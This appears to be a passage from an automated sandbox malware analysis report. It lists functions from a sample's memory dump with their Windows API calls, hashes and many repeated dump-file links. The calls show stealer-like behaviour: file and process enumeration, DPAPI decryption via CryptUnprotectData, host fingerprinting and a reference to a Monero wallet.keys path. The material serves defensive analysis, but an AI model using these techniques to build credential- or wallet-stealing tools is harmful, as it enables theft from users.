Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 99769ba9613400a8cd9aaa603335ea177bbd68ba49b6ddd8fb37b2b8584c2c06
Instruction ID: 4d12499559146f112e45e11903fdf7e29aaf86ea761b7be8ce1a55c948882496
Opcode Fuzzy Hash: 99769ba9613400a8cd9aaa603335ea177bbd68ba49b6ddd8fb37b2b8584c2c06
Instruction Fuzzy Hash: 07413D71950218ABDF24DB98DC99FEEB378FF88704F204199E00962291DB742F85CFA1

Function 0098E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,009A0D73), ref: 0098E4A2
StrCmpCA.SHLWAPI(?,009A14F8), ref: 0098E4F2
StrCmpCA.SHLWAPI(?,009A14FC), ref: 0098E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0098EBDF

Strings

\*.*, xrefs: 0098E44D

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 02219c68bbf432b59d1d25f088e208c790d4d09b06b1a1a435e4635eb50602a4
Instruction ID: addf96f4afdd71706734cf686b237182e756c2f60796d0f1b7d745d38af0e48e
Opcode Fuzzy Hash: 02219c68bbf432b59d1d25f088e208c790d4d09b06b1a1a435e4635eb50602a4
Instruction Fuzzy Hash: F3122D729101189ADF18FB69DCA6FED7379EFD4300F4045A8B50AA6191EE306F49CBD2

Function 00999600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0099961E
Process32First.KERNEL32(009A0ACA,00000128), ref: 00999632
Process32Next.KERNEL32(009A0ACA,00000128), ref: 00999647
StrCmpCA.SHLWAPI(?,00000000), ref: 0099965C
CloseHandle.KERNEL32(009A0ACA), ref: 0099967A

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 4fb99412f27793fcd5fdd0e62100721cc3876217c0e40629a1468065ba9bb84a
Instruction ID: b83056614a27ab42df5034c0d716ef3453fe9065e43a9a5465dd2c6b1ef20544
Opcode Fuzzy Hash: 4fb99412f27793fcd5fdd0e62100721cc3876217c0e40629a1468065ba9bb84a
Instruction Fuzzy Hash: 5E01E975A00208ABDF14DFA9C958BEDBBF8AB4C304F104189A905A7240DB349A40CF51

Function 00998680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009A05B7), ref: 009986CA
Process32First.KERNEL32(?,00000128), ref: 009986DE
Process32Next.KERNEL32(?,00000128), ref: 009986F3

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

CloseHandle.KERNEL32(?), ref: 00998761

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 77435799b465fae4ea39c0cb9d5e737f1147874be10ba07f8280586a20211a61
Instruction ID: ae769875f5ecb01ad6a4d8f8843505b3fce964065c99d81dfd9fed36a5a7b2af
Opcode Fuzzy Hash: 77435799b465fae4ea39c0cb9d5e737f1147874be10ba07f8280586a20211a61
Instruction Fuzzy Hash: EC313771911218ABCF24EB99DC85FEEB778FB89700F104199A10AA61A0DF346E45CFA1

Function 00997A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0157D9C0,00000000,?,009A0E10,00000000,?,00000000,00000000), ref: 00997A63
RtlAllocateHeap.NTDLL(00000000), ref: 00997A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0157D9C0,00000000,?,009A0E10,00000000,?,00000000,00000000,?), ref: 00997A7D
wsprintfA.USER32 ref: 00997AB7

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: d7b48fc913cf1e715932d6f83884df9cfc96c56c2437d79b1793875140f760e5
Instruction ID: de64ce794fcf091def09887956c31bb680f5896a3f903cb02695e14096f727d7
Opcode Fuzzy Hash: d7b48fc913cf1e715932d6f83884df9cfc96c56c2437d79b1793875140f760e5
Instruction Fuzzy Hash: E011A1B1946218EBEB20CF98DC49FA9B778FB44725F10479AE90A932C0DB741E40CF91

Function 00989B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00989B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00989BA3
LocalFree.KERNEL32(?), ref: 00989BD3

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 4dc145739a0e6cc46101f91e888074fa30ebe7a3a0c0683dc944c8d9c19cd80c
Instruction ID: c248e77dd5028baa1e1960bd7e55b2ab4e827f8f26fd8dd1f3c10f9829a64281
Opcode Fuzzy Hash: 4dc145739a0e6cc46101f91e888074fa30ebe7a3a0c0683dc944c8d9c19cd80c
Instruction Fuzzy Hash: B111A8B4A00209EFCB04DFA4D985EAE77B9FB88304F104559E915A7350D774AE10CF61

Function 009978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997910
RtlAllocateHeap.NTDLL(00000000), ref: 00997917
GetComputerNameA.KERNEL32(?,00000104), ref: 0099792F

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: ae75dea407d585907f596f2a875d2266a81798f908ae6d83e51c9ea01fa00cdf
Instruction ID: 06ffe9ef009fada1c10324eaa25ee8c3fa56cfdde7caaf0f6b67e57e21f0ba92
Opcode Fuzzy Hash: ae75dea407d585907f596f2a875d2266a81798f908ae6d83e51c9ea01fa00cdf
Instruction Fuzzy Hash: EC0186B1A04208EBDB10DFD8DD45FAAFBBCF748B15F10421AF545E3280D77459008BA1

Function 00997850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009811B7), ref: 00997880
RtlAllocateHeap.NTDLL(00000000), ref: 00997887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0099789F

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 8b54ac2a454cae7cb1101d23e56ccae7ada80926d241cddf25b8cc2137ad88c4
Instruction ID: c03bf5afeadbb1bfcb5ab7733cfed5b1f25e17c702274d3f618a8da7394e5279
Opcode Fuzzy Hash: 8b54ac2a454cae7cb1101d23e56ccae7ada80926d241cddf25b8cc2137ad88c4
Instruction Fuzzy Hash: 50F044B1944208ABCB00DF99DD45FAEFBB8F708715F10055AF605A3680C77915048BA1

Function 00981160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0098116A
ExitProcess.KERNEL32 ref: 0098117E

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
